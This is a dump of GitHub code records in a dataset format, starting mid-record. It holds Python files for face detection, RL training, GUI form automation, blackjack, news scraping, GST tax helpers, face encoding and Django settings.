circles\n\t\tfor (x, y, r) in circles:\n\t\t\t# draw the circle in the output image, then draw a rectangle\n\t\t\t# corresponding to the center of the circle\n\t\t\tcv2.circle(img, (x, y), r, (255, 255, 255), 1)\n\t\t\tcv2.circle(img, (x, y), 1, (255, 255, 255), 1)\n\n\t\t\tcircle_xyrs.append([x, y])\n\n\t\treturn img, circle_xyrs\n\n\telse:\n\t\treturn img, None\n\n\n\n\ndef detect_circle(img,par1=100,par2=20,minr=10,maxr=30):\n\n\tgray_image = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\tcircles = cv2.HoughCircles(gray_image, cv2.HOUGH_GRADIENT, 1, 20, param1=par1,param2=par2,minRadius=minr,maxRadius=maxr)\n\tcircles = np.uint16(np.around(circles))\n\n\n\treturn circles\n\n\ndef draw_circle(img, circles):\n\tfor i in circles[0,:]:\n\t\t# draw the outer circle\n\t\tcv2.circle(img,(i[0],i[1]),i[2],(0,255,0),2)\n\t\t# draw the center of the circle\n\t\tcv2.circle(img,(i[0],i[1]),2,(0,0,255),3)\n\n###################################################################\n#Visualization\t\n\ndef draw_face_rectangle (image, face_rectangle):\n\tfor (i,rect) in enumerate(face_rectangle):\n\t\t(x,y,w,h)=rectangle_to_box(rect)\n\t\t# Arguments : (source image, vertex of the rectangle, opposite vertex, color, optional : type of the line(how fat is the line, default is also ok))\n\t\tcv2.rectangle(image, (x,y),(x+w,y+h),(0, 255, 0),2)\n\ndef point_face_features (image, shape):\n\tfor (x,y) in shape:\n\t\t#(source image, center of the circle, radius, color)\n\t\tcv2.circle(image, (x,y), 1, (0,0,255))\n\ndef show_pic (descr, image):\n\tcv2.imshow(descr, image)\n\tcv2.waitKey(0)\n\tcv2.destroyAllWindows()\n\n\n","repo_name":"stelviopas/EyeTracking","sub_path":"face_features_recognition.py","file_name":"face_features_recognition.py","file_ext":"py","file_size_in_byte":4827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"12571495802","text":"# import required packages\nimport argparse\nimport flare.polgrad as pg\nimport flare.qpolgrad as qpg\nimport flare.kindling as fk\nimport numpy as np\nimport pybullet_envs\nfrom typing import Optional, Union, Tuple, List\n\n# set up argparser.\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-a\", \"--alg\", type=str, help=\"Algorithm to use\", default=\"PPO\")\nparser.add_argument(\n \"-e\", \"--env\", type=str, help=\"Env to train in\", default=\"LunarLander-v2\"\n)\nparser.add_argument(\n \"-ep\", \"--epochs\", type=int, help=\"Number of epochs to train for\", default=100\n)\nparser.add_argument(\n \"-hor\", \"--horizon\", type=int, help=\"Horizon length of each episode\", default=1000\n)\nparser.add_argument(\n \"-g\",\n \"--gamma\",\n type=float,\n help=\"Discount factor for GAE-lambda advantage calculation\",\n default=0.99,\n)\nparser.add_argument(\n \"-lam\",\n \"--lam\",\n type=float,\n help=\"Lambda for GAE-lambda advantage calculation\",\n default=0.97,\n)\nparser.add_argument(\n \"-l\",\n \"--layers\",\n nargs=\"+\",\n help=\"MLP hidden layer sizes. Enter like this: --layers 64 64. Makes MLP w/ 2 hidden layers w/ 64 nodes each.\",\n default=[64, 32],\n)\nparser.add_argument(\n \"-spe\",\n \"--steps_per_epoch\",\n type=int,\n help=\"How many env interactions per epoch\",\n default=4000,\n)\nparser.add_argument(\n \"-mbs\",\n \"--minibatch_size\",\n type=int,\n help=\"Minibatch size for training. Defaults to 4000, same as steps per epoch. Should be a multiple of steps per epoch.\",\n default=4000\n)\nparser.add_argument(\n \"-seed\",\n \"--seed\",\n type=int,\n help=\"Seed for agent and environment.\",\n default=0\n)\nparser.add_argument(\n \"-wandb\",\n \"--wandb\",\n action=\"store_true\",\n help=\"Whether to use weights and biases logger. Need to have weights and biases installed.\"\n)\nparser.add_argument(\n \"-project\",\n \"--project_name\",\n help=\"Project name for Weights and Biases logger.\",\n default = None\n)\nparser.add_argument(\n \"-run_name\",\n \"--run_name\",\n help=\"Name for run in plots. If None, defaults to algo_name/env_name/current_timestamp\",\n default = None\n)\n# get args from argparser\nargs = parser.parse_args()\n\n\nif __name__ == \"__main__\":\n # initialize training object. defined in flare/algorithms.py\n hids = tuple(int(i) for i in args.layers)\n if args.alg == \"REINFORCE\":\n pg.reinforce.learn(\n args.env,\n args.epochs,\n steps_per_epoch=args.steps_per_epoch,\n minibatch_size=args.minibatch_size,\n hidden_sizes=hids,\n gamma=args.gamma,\n lam=args.lam,\n seed=args.seed,\n hparams=args\n )\n if args.alg == \"PPO\":\n pg.ppo.learn(\n args.env,\n args.epochs,\n minibatch_size=args.minibatch_size,\n steps_per_epoch=args.steps_per_epoch,\n hidden_sizes=hids,\n gamma=args.gamma,\n lam=args.lam,\n seed=args.seed,\n hparams=args\n )\n elif args.alg == \"A2C\":\n pg.a2c.learn(\n args.env,\n args.epochs,\n steps_per_epoch=args.steps_per_epoch,\n minibatch_size=args.minibatch_size,\n hidden_sizes=hids,\n gamma=args.gamma,\n lam=args.lam,\n seed=args.seed,\n hparams=args\n )\n elif args.alg == \"DDPG\":\n trainer = qpg.DDPG(\n env,\n gamma=args.gamma,\n hidden_sizes=hids,\n logger_dir=args.folder,\n save_screen=args.save_screen,\n save_states=args.save_states,\n steps_per_epoch=args.steps_per_epoch,\n ) \n elif args.alg == \"TD3\":\n trainer = qpg.TD3(\n env,\n gamma=args.gamma,\n hidden_sizes=hids,\n logger_dir=args.folder,\n save_screen=args.save_screen,\n save_states=args.save_states,\n steps_per_epoch=args.steps_per_epoch,\n )\n elif args.alg == \"SAC\":\n trainer = qpg.SAC(\n env,\n gamma=args.gamma,\n hidden_sizes=hids,\n logger_dir=args.folder,\n save_screen=args.save_screen,\n save_states=args.save_states,\n steps_per_epoch=args.steps_per_epoch,\n )\n\n","repo_name":"jfpettit/flare","sub_path":"flare/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"37663552122","text":"import pyautogui as pyag\nimport pymsgbox as pymsg\n\n\n\"\"\"preenche o campo grupo de destaque do cadastro de clientes da aba Complemento a partir de uma \nplanilha. Preencher por estrela e acertar a quantidade de downs clicks para escolher o grupo\n\"\"\"\npyag.PAUSE = 0.3\n\nqtd_cli = pymsg.prompt(text='Digite a quantidade de clientes')\nestrelas = pymsg.prompt(text='Digite a quantidade de estrelas')\n\ncont = 0\n\nconfirma = pymsg.confirm(text='%s clientes a fazer. \\nVai começar! \\nFique na tabela excel, com a tela de cadastro de cliente alternada'%qtd_cli,\nbuttons=['Ok','Cancelar'])\n\nif confirma == 'Cancelar':\n quit()\n\nelif confirma == 'Ok':\n\n pyag.click(x=63,y=267, interval=0.3) #seleciona A2 na tabela\n pyag.click(x=63,y=267, interval=0.15)\n\n\n pyag.hotkey('ctrl','c') #copia cod cliente da tabela\n pyag.hotkey('alt','tab') #alterna para tela de cadastro do cliente no target\n\n while int(qtd_cli) > cont:\n\n pyag.doubleClick(x=334, y=136) # cod cliente target\n pyag.hotkey('ctrl','v')\n pyag.hotkey('tab')\n pyag.hotkey('alt','a')\n\n pyag.click(x=964, y=432) #seleciona a aba Complemento\n \n pyag.click(x=790, y=481, interval=0.15) #seleciona o campo grupo de destaque\n pyag.press('home') #vai para o topo da combobox\n\n pyag.press('down', presses=int(estrelas)) #seleciona a opção desejada (estrelas) do grupo destaque\n pyag.hotkey('tab')\n pyag.hotkey('alt','e')\n pyag.hotkey('alt','o', interval=0.1)\n\n\n pyag.hotkey('alt','tab') #retorna para a tabela\n pyag.press('right', presses=2)\n pyag.write('x') #registro X no cliente como feito \n pyag.press('down')\n pyag.press('home')\n pyag.hotkey('ctrl','c')\n\n pyag.hotkey('alt','tab')# retorna ao target\n \n cont += 1\n\n\n#posição grupo destaque (x=790, y=481)\n#posição celula A2 (x=63, y=267)\n\n\n\n","repo_name":"jefferschi/automacoes","sub_path":"preenche_grupo_destaque.py","file_name":"preenche_grupo_destaque.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8694659630","text":"from blackjack_package.deck_class import Deck\nfrom time import sleep\n\nclass Player:\n\n\t#Every player will have a hand of Cards and every table will have a deck\n\t#The hand variable refers to the values of a players hand of cards\n\t\n\tdeck = Deck()\n\n\tdef __init__(self, hand = [], name='default'):\n\t\tself.name = name\n\t\tself.hand = hand\n\n\tdef update_hand(self, num=1):\n\t\t#If num equals 1 then this method gets a card for player 1's hand else it get a card for the computers hand\n\t\tif(num == 1):\n\t\t\tprint('Getting a card from the deck...')\n\t\t\tpiece = Player.deck.get_card_value()\n\t\t\tsleep(1)\n\t\t\tprint(f'The card you got is a {piece}')\n\t\t\tself.hand.append(piece)\n\t\telse:\n\t\t\tprint('Getting a card from the deck...')\n\t\t\tself.hand.append(Player.deck.get_card_value())\n\n\tdef greeting(self):\n\t\treturn f'Hello {self.name}, Welcome to Blackjack!\\n\\nNote: You and the dealer will both start with 2 cards but you will only be able to see one of the dealers cards.\\n'\n\tdef get_value(self):\n\t\ttmp = []\n\t\tvalue = 0\n\t\tfor piece in self.hand:\n\t\t\tif(piece == 'ace'):\n\t\t\t\ttmp.append['ace']\n\t\t\telif(piece == 'jack' or piece == 'queen' or piece == 'king'):\n\t\t\t\tvalue += 10\n\t\t\telse:\n\t\t\t\tvalue += piece\n\t\tif(len(tmp)>0):\n\t\t\tif(value <= 11-len(tmp)):\n\t\t\t\tvalue = value + 11 + len(tmp) - 1\n\t\t\telse:\n\t\t\t\tvalue += len(tmp)\n\n\t\treturn value\n\n\tdef reset(self):\n\t\tPlayer.deck.reset_deck()\n\t\tself.hand.clear()\n\n\n\tdef display_hand(self, num=1):\n\t\t#If num equals 1 then this method displays player 1's hand else it displays the computer's hand\n\t\t#If num equals 2 then this method displays only the first card of the computer's hand\n\t\tif(num == 1):\n\t\t\tprint(f'Your hand consists of {self.hand} and the value of your hand is {self.get_value()}')\n\t\telif(num == 2):\n\t\t\tprint(f\"The computer's hand consists of {self.hand[0]} plus another card which is face down.\")\n\t\telse:\n\t\t\tprint(f\"The computer's hand consists of {self.hand} and has a value of {self.get_value()}\")\n\n\n\n\n","repo_name":"Satya191/blackjack_project","sub_path":"blackjack_package/player_class.py","file_name":"player_class.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40807217932","text":"# website text extraction\nimport feedparser\nimport subprocess\nimport os\nimport math\nimport re\nimport html2text\nimport requests\nfrom selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport sqlite3\nfrom sqlite3 import Error\nimport time\nimport datetime\nimport articleDateExtractor\n\n\n# globally set driver to use later for taking screenshot of homepage\n# recommendation: Selenium is deprecated, use another package in the future\ndriver = webdriver.PhantomJS()\ndriver.set_window_size(1024, 768)\n\n\n# Display article_data table from the database\ndef display_article_data(conn):\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM article_data\")\n rows = cur.fetchall()\n for row in rows:\n print(row)\n\n\n# RSS Feed extraction: not in use, but could be helpful later\ndef rss_feed(url):\n rss = feedparser.parse(url)\n cols = rss.entries[1].keys()\n print('RSS info available', cols)\n\n print('\\nNumber of RSS posts : ' + str(len(rss.entries)) + '\\n\\n')\n\n for i in range(1,len(rss.entries)):\n print('Title: ' + str(rss.entries[i].title) + '\\n' + 'Link: ' + \n str(rss.entries[i].link) + '\\n\\n')\n return\n\n\n# Checks that a url is valid and does not return an error\ndef is_valid_url(url):\n try:\n url_page = requests.get(url)\n except:\n return False\n return True\n\n\n# Checks that a Twitter account for the given handle exists\ndef is_valid_handle(handle):\n try:\n url_page = requests.get('https://twitter.com/' + handle)\n except:\n return False\n return True\n\n\n# Takes a screenshot of home page\ndef save_screenshot(url, direct_site, site_key):\n driver.save_screenshot(direct_site + site_key + '.png')\n\n\n# get plain text of an article\ndef get_preview(soup_article):\n h = html2text.HTML2Text()\n h.ignore_links = True # comment out if you want links\n h.ignore_images = True # comment out if you want images\n return h.handle(str(soup_article).decode('utf-8'))\n\n\n# Create local directories for a given site\ndef save_homepage(url, site_key):\n if not os.path.exists(os.path.join(os.path.dirname(__file__), site_key+'/')):\n # create the local folder for the site if it does not already exist\n os.makedirs(os.path.join(os.path.dirname(__file__), site_key+'/'))\n driver.get(url)\n direct_site = os.path.join(os.path.dirname(__file__), site_key + '/')\n # save screenshot of homepage to {site_key}/\n save_screenshot(url, direct_site, site_key)\n page = requests.get(url)\n # parse homepage and save as HTML\n soup = BeautifulSoup(page.text)\n # save parsed homepage to {site_key}/\n w = open(direct_site + 'parsedHomepage.txt', 'w+')\n w.write(str(soup))\n w.close()\n # return soup of the homepage\n return soup\n\n\n# Takes a list of article links, loops through and saves HTML in a text file for each\ndef write_articles(url, articleLinks, site_key, folder, cur, conn):\n # keep count variable for identification of articles in their names\n # note: this implementation rewrites the folder every time - can be changed later to save all history\n count = 1\n for article in articleLinks:\n # loop through the list of article links stripped from homepage\n if (is_valid_url(article)):\n try:\n page_article = requests.get(article)\n except:\n print(article + \" caused a problem!\")\n continue # moves on to the next article link\n soup_article = BeautifulSoup(page_article.text)\n # saves the HTML to the folder with the given naming convention\n w = open(folder + site_key + str(count) + '.txt','w+')\n w.write(str(soup_article))\n w.close()\n count += 1\n # call the authors function to save author(s) + Twitter handle(s) to database\n # this function does the majority of the extraction work\n insert_authors_articles(url, site_key, articleLinks, cur, conn)\n\n\n# Scrapes the homepage and finds all (potential) article links\ndef find_articles(url, site_key, soup, cur, conn):\n # create directory if it doesn't exist\n folder = os.path.join(os.path.dirname(__file__), site_key + '/articles/')\n if not os.path.exists(folder):\n os.makedirs(folder)\n else: # clear the directory to write new files\n for article in os.listdir(folder):\n file_path = os.path.join(folder, article)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n if site_key == 'cnn': # implementation as of March 2019\n # for CNN: the div class \"cd__content\" usually holds the a href for article\n # but this is not shown in the html.parser, instead they're in {\"uri\": /link/}\n # note: they're all under {articleList: [list of articles]}\n # use regular expressions to extract url value for 'uri' attribute:\n articleList = re.search('(?<=(\"articleList\":)).+?(?=}])', str(soup)).group(0)\n # get all the urls\n articleLinks = re.findall('((?<=(\"uri\":\")).+?(?=\"))', articleList)\n articleLinks = [x for x, y in articleLinks]\n articleLinks = [(url+x) if x[0]=='/' else x for x in articleLinks]\n\n # go into each of these links and get links / references, also save and clean text\n # save each article to {site_key}/articles/, author info to db\n write_articles(url, articleLinks, site_key, folder, cur, conn)\n \n elif site_key == 'foxnews': # implementation as of March 2019\n # Fox News is formatted differently from CNN, some articles may have been missed\n # took the ones that had header class=\"title\"\n # print(str(soup))\n articleList = re.findall(r'class=\"title\">', str(soup))\n # print('articleList: ')\n # print(articleList)\n # get rid of all special characters at beginning of string\n articleLinks = [re.sub(r'^\\W+', 'https://', x) for x in articleList]\n articleLinks = [x for x in articleLinks if \"www.\" in x]\n # print(articleLinks)\n # save each article to {site_key}/articles/, author info to db\n write_articles(url, articleLinks, site_key, folder, cur, conn)\n\n else:\n # implementation as of April 2019\n # create generalized process for other sites (keeping CNN and Fox News because already implemented)\n # go from specific -> general, FUTURE WORK: keep adding footprints here\n if (url == \"https://cnbc.com/politics\"):\n url = \"https://cnbc.com\" # cnbc specific case because of how the links are extracted\n if (len(re.findall('((?<=(\"type\":\"article\",\"link\":\")).+?(?=\"))', str(soup))) != 0):\n articleList = re.findall('((?<=(\"type\":\"article\",\"link\":\")).+?(?=\"))', str(soup))\n elif (len(re.findall('((?<=(href=\")).+?(?=\\stitle=))', str(soup)))):\n articleList = re.findall('((?<=(href=\")).+?(?=\"\\stitle=))', str(soup))\n elif (len(re.findall('((?<=(href=\")).+?(?=\">))', str(soup)))):\n articleList = re.findall('((?<=(href=\")).+?(?=\">))', str(soup))\n # clean article list\n articleList = [x for x,y in articleList]\n # remove any backslashes / misc. characters\n articleList = [x.replace(\"\\\\u002F\", \"/\") for x in articleList]\n articleList = [x.replace(\"\\\\\", \"/\") for x in articleList]\n articleList = [x.replace(\"//\", \"/\") for x in articleList]\n articleLinks = [(url+x) if (x[0]=='/') else x for x in articleList]\n\n # print(articleLinks)\n\n # call write_articles to save all the content from each link to a file in the directory\n write_articles(url, articleLinks, site_key, folder, cur, conn)\n\n\n# Scrapes all the information from each of the articles and adds to database\ndef insert_authors_articles(url, site_key, articleLinks, cur, conn):\n # iterate through the site_key's directory of articles\n for article in articleLinks:\n # check that the link is valid before opening and saving\n # if invalid, skip to next URL\n if not is_valid_url(article):\n continue\n \n page_article = requests.get(article)\n soup_article = BeautifulSoup(page_article.text)\n \n if site_key == 'cnn': # implementation as of March 2019, specific to CNN\n # get title of article\n title = re.search('(?<=()).+?(?=)', str(soup_article))\n if (title != None):\n title = title.group(0)\n else:\n continue\n # get category of article\n category = re.search('(?<=(meta content=\"https://www.cnn.com/)).+?(?=\")', str(soup_article))\n if (category != None):\n category = category.group(0)\n if (category[0:6] == \"videos\"):\n category = category[7:].split('/')[0]\n if (category[0].isdigit()):\n category = None\n else:\n category = category[11:].split('/')[0]\n # get the date it was written\n date_written = articleDateExtractor.extractArticlePublishedDate(article)\n # note: the publish times seem to be fairly inaccurate, only take year/month/day\n date_written = date_written.strftime('%Y-%m-%d')\n # this is the current date, to check if date written extracted correctly\n ts = time.time()\n date_current = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n # note: the following date/year cutoff can change - I'm assuming that if the year is\n # older than 5 years, it likely would not have shown up on the front page \n # if date is not in a valid range [date_cutoff_low, current_time)\n date_cutoff_low = 2015\n if (date_written[0:3] < date_cutoff_low or date_written > date_current):\n date_written = None # date will be inserted as NULL\n # get content of the article\n content = get_preview(soup_article)\n\n # extract author string from HTML\n # clean to get one name (take everything after 'by', separate by 'and')\n # Note: make sure 'by' and 'and' are NOT case-sensitive\n authorList = re.search('(?<=(\"author\":\")).+?(?=\")', str(soup_article))\n if (authorList != None): # in this I'm only adding to database articles with authors\n authorList = authorList.group(0)\n authors = re.split('by ', authorList, flags=re.IGNORECASE)\n if len(authors) >= 2:\n authors = authors[1:]\n authors = re.split(' and ', ','.join(authors), flags=re.IGNORECASE)\n authors = re.split(',', ','.join(authors))\n # special case for CNN - CNN will show up in the author list\n authors = [x for x in authors if \"CNN\" not in x]\n # additional cleaning\n authors = [x for x in authors if x is not '\"' and x is not '']\n\n # format for CNN: \"profileUrl\":\"/profiles/*****\"\n links = re.findall('((?<=(\"profileUrl\":\")).+?(?=\"))', str(soup_article))\n links = [x for x,y in links]\n links = [(url+x) if x[0]=='/' else x for x in links]\n\n # if the length of the authors list equals list of available links and it's not empty\n # note: I have this equality restriction imposed for simplicity of making sure authors match up with profiles\n # this is further explained in report\n if (len(authors) == len(links) and len(authors) != 0):\n # store everything in a dictionary - only did this for CNN, leaving in case it's helpful later\n authorInfo = {}\n for i in range(0,len(links)):\n # match author with link\n author = authors[i]\n authorInfo[author] = {}\n authorInfo[author][\"link\"] = links[i]\n if (is_valid_url(links[i])):\n author_page = requests.get(links[i])\n author_soup = BeautifulSoup(author_page.text)\n handle = author_soup.find('div', attrs={'class': 'social-description__follow-icon social-description__follow-icon--twitter cnn-icon'})\n if (handle is not None):\n handle = handle.find('a')['href']\n handle = handle[14:]\n if (handle[0] == '@' or handle[0] == '/'):\n handle = handle[1:]\n if '.' in handle: # this is not a valid handle!\n handle = None\n if (is_valid_handle(handle)):\n authorInfo[author][\"handle\"] = handle\n else:\n authorInfo[author][\"handle\"] = None\n else:\n authorInfo[author][\"handle\"] = None\n\n # loop through dictionary and add to database\n for author in authorInfo:\n # for now, only insert if a handle exists, since we're using it as the primary key\n if (authorInfo[author][\"handle\"] is not None):\n # add all extracted values into article_data\n cur.execute('INSERT OR IGNORE INTO article_data (article_link, article_date, author_name, author_handle, site, article_title,'\n ' category, text_preview) VALUES (?,?,?,?,?,?,?,?)', (article, date_written, author, authorInfo[author][\"handle\"], site_key, title, category, content))\n\n else: # any other website - generalized implementation\n if (url == \"https://cnbc.com/politics\"):\n url = \"https://cnbc.com\" # cnbc specific case, because I used the politics section\n # FIRST: find handle on the article page, if it exists\n # get the date it was written\n date_written = articleDateExtractor.extractArticlePublishedDate(article)\n if date_written != None:\n # note: the publish times seem to be fairly inaccurate, only take year/month/day\n date_written = date_written.strftime('%Y-%m-%d')\n # this is the current date, to check if date written extracted correctly\n ts = time.time()\n date_current = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\n # note: the following date/year cutoff can change - I'm assuming that if the year is\n # older than 5 years, it likely would not have shown up on the front page \n # if date is not in a valid range [date_cutoff_low, current_time)\n date_cutoff_low = 2015\n if (date_written[0:3] < date_cutoff_low or date_written > date_current):\n date_written = None # date will be inserted as NULL\n # get content of the article\n content = get_preview(soup_article)\n # initialize empty lists for handles and authors\n handleList = []\n authorList = []\n # footprints listed below for handle extraction - can add more for higher success rate\n if (len(re.findall('(?i)((?<=(on Twitter )).+?(?=))', str(soup_article))) != 0):\n authorList = re.findall('(?i)((?<=(\"url\" rel=\"author\">)).+?(?=))', str(soup_article))\n elif (len(re.findall('(?i)((?<=(\"Person\",\"name\":\")).+?(?=\"))', str(soup_article))) != 0):\n authorList = re.findall('(?i)((?<=(\"Person\",\"name\":\")).+?(?=\"))', str(soup_article))\n \n # remove duplicates if they exist\n authorList = [x for x,y in authorList]\n authorList = list(dict.fromkeys(authorList))\n\n # clean authors\n newAuthorList = []\n if (len(authorList) != 0): # in this project I'm only adding articles with authors\n for i in range(len(authorList)):\n print(authorList[i])\n authors = re.split('by ', authorList[i], flags=re.IGNORECASE)\n if len(authors) >= 2:\n authors = authors[1:]\n authors = re.split(' and ', ','.join(authors), flags=re.IGNORECASE)\n authors = re.split(',', ','.join(authors))\n for j in range(len(authors)):\n newAuthorList.append(authors[j])\n authorList = newAuthorList\n\n # if handle has not been found yet, go into author profile page\n if len(newAuthorList) != len(handleList):\n # find author profile page if it exists, go find handle there\n # can and should add more footprints here - many other ways to get the author's profile page\n authorLinks = []\n handleList = []\n if (len(re.findall('(?i)((?<=(href=\"/author/)).+?(?=\"))', str(soup_article))) != 0):\n authorLinks = re.findall('(?i)((?<=(href=\"/author/)).+?(?=\"))', str(soup_article))\n authorLinks = [url+\"/author/\"+x for x,y in authorLinks]\n elif (len(re.findall('(?i)((?<=(GST Documentation')\n\n\t\t\tfrappe.throw(msg)\n\n\ndef update_itc_availed_fields(doc, method):\n\tcountry = frappe.get_cached_value('Company', doc.company, 'country')\n\n\tif country != 'India':\n\t\treturn\n\n\t# Initialize values\n\tdoc.itc_integrated_tax = doc.itc_state_tax = doc.itc_central_tax = doc.itc_cess_amount = 0\n\tgst_accounts = get_gst_accounts(doc.company, only_non_reverse_charge=1)\n\n\tfor tax in doc.get('taxes'):\n\t\tif tax.account_head in gst_accounts.get('igst_account', []):\n\t\t\tdoc.itc_integrated_tax += flt(tax.base_tax_amount_after_discount_amount)\n\t\tif tax.account_head in gst_accounts.get('sgst_account', []):\n\t\t\tdoc.itc_state_tax += flt(tax.base_tax_amount_after_discount_amount)\n\t\tif tax.account_head in gst_accounts.get('cgst_account', []):\n\t\t\tdoc.itc_central_tax += flt(tax.base_tax_amount_after_discount_amount)\n\t\tif tax.account_head in gst_accounts.get('cess_account', []):\n\t\t\tdoc.itc_cess_amount += flt(tax.base_tax_amount_after_discount_amount)\n\ndef update_taxable_values(doc, method):\n\tcountry = frappe.get_cached_value('Company', doc.company, 'country')\n\n\tif country != 'India':\n\t\treturn\n\n\tgst_accounts = get_gst_accounts(doc.company)\n\n\t# Only considering sgst account to avoid inflating taxable value\n\tgst_account_list = gst_accounts.get('sgst_account', []) + gst_accounts.get('sgst_account', []) \\\n\t\t+ gst_accounts.get('igst_account', [])\n\n\tadditional_taxes = 0\n\ttotal_charges = 0\n\titem_count = 0\n\tconsidered_rows = []\n\n\tfor tax in doc.get('taxes'):\n\t\tprev_row_id = cint(tax.row_id) - 1\n\t\tif tax.account_head in gst_account_list and prev_row_id not in considered_rows:\n\t\t\tif tax.charge_type == 'On Previous Row Amount':\n\t\t\t\tadditional_taxes += doc.get('taxes')[prev_row_id].tax_amount_after_discount_amount\n\t\t\t\tconsidered_rows.append(prev_row_id)\n\t\t\tif tax.charge_type == 'On Previous Row Total':\n\t\t\t\tadditional_taxes += doc.get('taxes')[prev_row_id].base_total - doc.base_net_total\n\t\t\t\tconsidered_rows.append(prev_row_id)\n\n\tfor item in doc.get('items'):\n\t\tproportionate_value = item.base_net_amount if doc.base_net_total else item.qty\n\t\ttotal_value = doc.base_net_total if doc.base_net_total else doc.total_qty\n\n\t\tapplicable_charges = flt(flt(proportionate_value * (flt(additional_taxes) / flt(total_value)),\n\t\t\titem.precision('taxable_value')))\n\t\titem.taxable_value = applicable_charges + proportionate_value\n\t\ttotal_charges += applicable_charges\n\t\titem_count += 1\n\n\tif total_charges != additional_taxes:\n\t\tdiff = additional_taxes - total_charges\n\t\tdoc.get('items')[item_count - 1].taxable_value += diff\n","repo_name":"DeeMysterio/uae_compliance","sub_path":"uae_compliance/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":10587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8168936785","text":"\r\n# secrets.py\r\n\r\n# Import the configparser library\r\nimport configparser\r\n\r\n# Create a new ConfigParser object\r\nconfig = configparser.ConfigParser()\r\n\r\n# Read the secrets.ini file\r\nconfig.read('secrets.ini')\r\n\r\n# Create a dictionary called 'secrets'\r\nsecrets = config['apikey']\r\n\r\n# Retrieve the API key\r\napi_key = secrets['api_key']\r\n\r\n# 4. Import the secrets.py file into your main.py file.\r\n# 5. Use the api_key variable to access your API key.\r\n# 6. Add the secrets.ini and secrets.py files to your .gitignore file.\r\n# 7. Push your code to GitHub.\r\n# 8. Create a new repository on GitHub called weather-app.\r\n# 9. Push your code to the new repository.\r\n# 10. Create a new branch called secrets.\r\n# 11. Push your code to the secrets branch.\r\n# 12. Create a pull request to merge the secrets branch into the master branch.\r\n# 13. Merge the pull request.\r\n# 14. Delete the secrets branch.\r\n","repo_name":"gulshanrana10/Weather-forecast-app","sub_path":"secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74049726889","text":"import cv2 as cv\nimport face_recognition\nimport pickle\nimport os\n# dataPath=\"data\"\ndataPath=\"data\"\n\ndataList=os.listdir(dataPath)\n\nprint(dataList)\nimgList=[]\nstudentIDs=[]\nfor img in dataList:\n # print(os.path.join(dataPath,img))\n imgList.append(cv.imread(os.path.join(dataPath,img)))\n # print(os.path.splitext(img))\n # print(os.path.splitext(img)[0])\n studentIDs.append(os.path.splitext(img)[0])\nprint(\"studentIDs : \",studentIDs)\n\n# making encode of images\ndef findEncodings(imgList):\n encodeList=[]\n for img in imgList:\n img=cv.cvtColor(img,cv.COLOR_BGR2RGB)\n encode=face_recognition.face_encodings(img)[0]\n encodeList.append(encode)\n return encodeList\n\n\ndef myencoder():\n print(\"encoding started...\")\n knownEncodeList=findEncodings(imgList)\n print(\"encoding completed\")\n\n filename='encoder/EncodeFile.p'\n if os.path.exists(filename):\n # Delete the file\n os.remove(filename)\n\n model=[knownEncodeList,studentIDs]\n file=open(filename,\"wb\")\n pickle.dump(model,file)\n file.close()\n print(\"Model Saved\")\n\nif __name__ == \"__main__\":\n print(\"--------encoder.py-------\")","repo_name":"bilalansar3/FRS-face-recognition-system","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7528098089","text":"# -*- coding: UTF-8 -*-\n\n#===============================================================================\n# Author: 骛之\n# File Name: ouds/settings.py\n# Revision: 0.1\n# Date: 2007-2-5 17:48\n# Description: settings.\n#===============================================================================\n\nDEBUG = False\n\nTEMPLATE_DEBUG = False\n\nADMINS = (\n #(u'长弓骛之', 'ourunix@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'oudsus_blog',\n 'USER': 'oudsus',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nTIME_ZONE = 'Asia/Shanghai'\n\nLANGUAGE_CODE = 'zh-cn'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nLOCALE_PATHS = (\n '/home/oudsus/Ouds/blog/locale',\n)\n\nLANGUAGES = (\n ('zh-cn', '简体中���'),\n ('zh-tw', '繁體中文'),\n ('en', 'English'),\n ('de', 'Deutsch'),\n ('fr', 'Français'),\n ('it', 'Italiano'),\n ('pt', 'Português'),\n ('es', 'Español'),\n ('sv', 'Svenska'),\n ('ru', 'Русский'),\n ('jp', '日本語'),\n ('ko', '한국어'),\n)\n\nMEDIA_ROOT = '/home/oudsus/Ouds/blog/media'\n\nADMIN_MEDIA_PREFIX = '/media/admin/'\n\nSECRET_KEY = '%zg$h*ibw9t3by1t#bm58jn2&i*^u8@0nu30ow=jw1u-pe93s)'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n )\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n #'django.middleware.cache.CacheMiddleware',\n 